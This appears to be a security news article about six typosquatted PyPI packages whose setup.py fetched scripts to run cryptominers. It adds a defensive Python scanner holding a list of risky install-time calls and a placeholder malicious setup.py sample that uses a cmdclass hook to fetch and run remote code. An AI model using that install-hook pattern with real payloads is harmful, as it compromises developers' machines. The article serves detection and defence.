Sonatype researchers have recently discovered malicious packages in PyPI, a software code repository, that turn developers' workstations into cryptomining machines.
A supply-chain attack
Any such malicious package could be used to trigger a supply-chain attack, seeding downstream projects with infostealers or cryptominers.
Experts found six malicious packages, namely maratlib, maratlib1, matplatlib-plus, mllearnlib, mplatlib, and learninglib hidden inside the PyPI repository.
The same user uploaded all of the malicious packages in an attempt to trick developers into downloading them, and the attempt worked.
The packages were downloaded about 5,000 times since April, helped by names that were misspellings of legitimate Python projects.
The actors embedded the malicious code in the setup.py file, a build script that executes during installation.
Diving into the details
Open-source code repositories such as PyPI, GitHub, or RubyGems are under constant attack by threat actors seeking to mine cryptocurrency.
While studying this particular case, researchers found that the packages attempted to download a Bash script (aza2.sh) from a GitHub repository that is no longer available.
The script's role was to run the Ubqminer cryptominer on the compromised machines.
Another variant of the script instead carried a different cryptomining program that uses GPU power, the open-source T-Rex miner.
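A static pre-install check for the setup.py mechanism described above, added here as an example and not code from Sonatype or the article. The list of risky calls and the constructed sample package are assumptions of this example; the sample is only parsed, never executed.

```python
import ast

# Calls that have no business running inside a build script (assumed list).
RISKY_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output",
    "urllib.request.urlopen", "requests.get", "exec", "eval",
}

def _dotted(node: ast.AST) -> str:
    """Render a call target such as subprocess.run as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return f"{_dotted(node.value)}.{node.attr}"
    return ""

def scan_setup_py(source: str) -> list[str]:
    """Return line-tagged findings for one setup.py; an empty list means clean."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        target = _dotted(node.func)
        if target in RISKY_CALLS:
            findings.append((node.lineno, f"install-time call {target}()"))
        # cmdclass= lets a package hook setuptools' install/develop commands
        if target == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
            findings.append((node.lineno, "setup() overrides cmdclass"))
    return [f"L{line}: {text}" for line, text in sorted(findings)]

# Constructed sample in the shape the article describes: a custom install
# command fetches a remote script and runs a command. Parsed here, never run.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import os, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        payload = urllib.request.urlopen("https://example.invalid/PLACEHOLDER.sh").read()
        os.system("PLACEHOLDER_COMMAND")

setup(name="placeholder-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for finding in scan_setup_py(SAMPLE_SETUP_PY):
        print(finding)
```

Run it against the unpacked sdist of a package before installing it; a cmdclass override or any network or process call in setup.py deserves a manual look.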
Cryptocurrency makes an effective target
Cryptocurrency platforms and their users currently face an incessant series of attacks.
Threat actors were found mailing fake replacement devices to Ledger customers to steal from their cryptocurrency wallets. The data of 272,853 people who purchased a Ledger device was exposed in a December breach.
According to research, cryptojacking is one of the most commonly discussed topics in cybercriminal forums.
Moreover, a report suggested that Australians paid over two million dollars in BTC and other cryptocurrencies to cybercriminals last year.
A fourfold spike in cryptomining attacks was observed during Q1 2020, as the price of BTC shot up steeply during that time.
Conclusion
While seeding software repositories with malware-laced packages is a popular technique for carrying out supply-chain attacks, cryptojacking activity is also a sign of security weaknesses on the business end. Security teams are advised to watch for degraded computing performance, processor burnout, or increased electricity consumption. An active response from the developers and maintainers of software repositories is highly recommended.